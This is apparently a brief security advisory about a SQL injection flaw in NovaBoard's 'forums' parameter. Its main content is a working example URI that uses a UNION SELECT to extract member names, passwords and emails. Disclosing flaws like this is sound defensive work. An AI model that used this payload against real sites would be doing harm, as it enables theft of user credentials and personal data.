NovaBoard 'forums' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+


 

Privacy Statement
Copyright 2010, SecurityFocus